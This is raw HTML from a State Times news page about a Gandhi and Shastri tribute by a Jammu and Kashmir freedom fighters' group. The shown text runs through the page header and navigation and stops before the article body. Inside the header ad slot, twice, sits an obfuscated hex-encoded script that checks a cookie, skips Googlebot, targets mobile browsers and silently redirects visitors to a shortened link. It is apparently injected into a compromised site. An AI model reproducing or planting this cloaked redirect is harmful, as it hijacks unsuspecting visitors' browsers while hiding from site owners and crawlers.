<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-GB"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="en-GB"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="en-GB"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-GB"> <!--<![endif]-->
    <head>
	<meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri | State Times</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php">
<meta property="og:image" content="http://news.statetimes.in/wp-content/uploads/2019/10/JKFFA-1024x576.jpg"/>
    <meta property="og:image:width" content="1024" />
    <meta property="og:image:height" content="1024" />

<meta property="og:title" content="Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="https://youtu.be/ZQ7Y49WBdZI Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri at Dogra Shourya Samarak, Ambphalla"/>
<meta property="og:url" content="http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/"/>
<meta property="og:site_name" content="State Times"/>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="http://news.statetimes.in/wp-content/uploads/2014/08/favicon.png?x39047" />
<link rel="apple-touch-icon" href="http://news.statetimes.in/wp-content/themes/goodnews5/apple-touch-icon-precomposed.png?x39047" />

<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php" />
        <!--[if lt IE 9]>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/html5.js?x39047"></script>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/IE9.js?x39047"></script>
	<![endif]-->
	<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Feed" href="http://news.statetimes.in/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Comments Feed" href="http://news.statetimes.in/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Jammu and Kashmir Freedom Fighter Association pays tribute to Mahatma Gandhi and Lal Bahadur Shastri Comments Feed" href="http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/news.statetimes.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wp-block-library-css'  href='http://news.statetimes.in/wp-includes/css/dist/block-library/style.min.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/css/styles.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='chosen-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/chosen.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/frontend.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/plugins.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/main.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/media.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://news.statetimes.in/wp-content/themes/child-theme/style.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='black-style-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/flamingo.css?x39047' type='text/css' media='all' />
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery-migrate.min.js?x39047'></script>
<link rel='https://api.w.org/' href='http://news.statetimes.in/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.statetimes.in/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://news.statetimes.in/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Congress Leaders pays tribute to Mahatma Gandhi in Jammu' href='http://news.statetimes.in/congress-leaders-pays-tribute-to-mahatma-gandhi-in-jammu/' />
<meta name="generator" content="WordPress 5.0.4" />
<link rel="canonical" href="http://news.statetimes.in/jammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri/" />
<link rel='shortlink' href='http://news.statetimes.in/?p=530426' />
<link rel="alternate" type="application/json+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fjammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fjammu-and-kashmir-freedom-fighter-association-pays-tribute-to-mahatma-gandhi-and-lal-bahadur-shastri%2F&#038;format=xml" />
<meta name="msvalidate.01" content="E16D694C0F66CFA1ABC9F98B3398A6E5" />
<script type="text/javascript" async defer
  src="https://apis.google.com/js/platform.js?publisherid=101378335416363517049">
</script>
<link href="https://plus.google.com/101378335416363517049" rel="publisher" />
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3121650879019050",
          enable_page_level_ads: true
     });
</script>
<script type="text/javascript" src="//sdk.adspruce.com/1/adsprucetag.js?pid=2271&sid=1" defer></script>

<meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://news.statetimes.in/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x39047" media="screen"><![endif]--><style type="text/css" title="dynamic-css" class="options-output">body{color:#282828;}{color:#262626;}.news-ticker{background-color:#262626;}.news-ticker li a, .news-ticker li{color:#ffffff;}</style><style type="text/css">
    
.header > .inner, .header .logo {
line-height: 112px;
height: 112px;
}
/* Category background */
</style>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>    </head>
    <body class="post-template-default single single-post postid-530426 single-format-video both-sidebars-all both-sidebars singular both_sidebars_same_width fade-imgs-in-appear sticky_navigation_on navigation_highlight_ancestor time_in_twelve_format one-side-wide both-sidebars both-sides-true smooth_scroll_enable show_secondary_sidebar_on_ipad goodnews-child wpb-js-composer js-comp-ver-5.4.7 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
    
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
        <div class="boxed-wrap clearfix">
	    <div id="header-wrapper">
                         <div class="topbar">
  <div class="inner">
            <div class="top-left-content">
                 			     <ul id="menu-top-menu" class="top-nav mom_visibility_desktop"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li id="menu-item-71" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li id="menu-item-4980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li id="menu-item-4981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li id="menu-item-57375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>
     			     <div class="mom_visibility_device device-top-menu-wrap">
			      <div class="top-menu-holder"><i class="fa-icon-reorder mh-icon"></i></div>
			      <ul id="menu-top-menu-1" class="device-top-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="http://news.statetimes.in/about-us/">About us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="http://news.statetimes.in/contact-us/">Contact us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>			     </div>

                        </div> <!--tb left-->
        <div class="top-right-content">
            		    <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>
                    </div> <!--tb right-->
</div>
 </div> <!--topbar-->
             <header class="header " itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
                <div class="inner">
						                    <div class="logo">
					                    <a href="http://news.statetimes.in">
		                                                    <img src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" alt="State Times" width="445" height="77" />
                                                                                               <img class="mom_retina_logo" src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" width="445" height="77" alt="State Times" />
                                                		                    </a>

					
                    </div>
                                        <div class="header-right">
                                  		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-669 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-669 .mom-e3lanat-inner').boxSlider({
				autoScroll: true,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-669 .adr-next',
				prev: '.e3lanat-rotator-id-669 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-669" style="width:728px; height:90px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
					<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<script>var _0x446d=["\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e","\x69\x6e\x64\x65\x78\x4f\x66","\x63\x6f\x6f\x6b\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x32\x4c\x4c\x33\x41\x4f\x58","\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6d\x65","\x5f\x6d\x61\x75\x74\x68\x74\x6f\x6b\x65\x6e\x3d\x31\x3b\x20\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d","\x74\x6f\x55\x54\x43\x53\x74\x72\x69\x6e\x67","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script>	
</div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                    </div> <!--header right-->
                    
                <div class="clear"></div>
                </div>
            </header>
	    	    </div> <!--header wrap-->
                                    <nav id="navigation" itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" role="navigation" class="dd-effect-slide ">
                <div class="navigation-inner">
                <div class="inner">
                                                                <ul id="menu-primary-two" class="main-menu mom_visibility_desktop"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58091' data-id='15' data-object='category' data-layout=''><ul id='mn-ul-latest-58091'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/skuast-j-officers-welfare-association-calls-on-vc/' title='SKUAST-J Officers&#8217; Welfare Association calls on VC'><img src='http://news.statetimes.in/wp-content/uploads/2019/10/SKUAST-J-Officers’-Welfare-Association-called-on-VC.jpg?x39047' alt='SKUAST-J Officers&#8217; Welfare Association calls on VC' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/skuast-j-officers-welfare-association-calls-on-vc/' title='SKUAST-J Officers&#8217; Welfare Association calls on VC'> SKUAST-J Officers&#8217; Welfare Association calls on VC</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/gcw-gnagar-students-protest-change-in-college-timing-block-bikram-chowk/' title='GCW G&#8217;Nagar students protest change in college timing; block Bikram Chowk'><img src='http://news.statetimes.in/wp-content/uploads/2019/10/Students-protest-against-Cluster-University-2.jpg?x39047' alt='GCW G&#8217;Nagar students protest change in college timing; block Bikram Chowk' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/gcw-gnagar-students-protest-change-in-college-timing-block-bikram-chowk/' title='GCW G&#8217;Nagar students protest change in college timing; block Bikram Chowk'> GCW G&#8217;Nagar students protest change in college timing; block Bikram Chowk</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/acb-produces-charge-sheet-against-so-in-disproportionate-assets-case/' title='ACB produces charge-sheet against SO in disproportionate assets case'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='ACB produces charge-sheet against SO in disproportionate assets case' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/acb-produces-charge-sheet-against-so-in-disproportionate-assets-case/' title='ACB produces charge-sheet against SO in disproportionate assets case'> ACB produces charge-sheet against SO in disproportionate assets case</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/art-370-abrogation-sc-rules-out-status-quo/' title='Art 370 abrogation; SC rules out status quo'><img src='http://news.statetimes.in/wp-content/uploads/2019/10/SCCCCCCCCCCCCCCC.jpg?x39047' alt='Art 370 abrogation; SC rules out status quo' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/art-370-abrogation-sc-rules-out-status-quo/' title='Art 370 abrogation; SC rules out status quo'> Art 370 abrogation; SC rules out status quo</a><span> - 12 hours ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/jknews/topjknews/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58083' data-id='16' data-object='category' data-layout=''><ul id='mn-ul-latest-58083'></ul><a href='http://news.statetimes.in/section/news/jknews/local-news/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58086' data-id='17' data-object='category' data-layout=''><ul id='mn-ul-latest-58086'></ul><a href='http://news.statetimes.in/section/news/jknews/jksports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58085' data-id='233' data-object='category' data-layout=''><ul 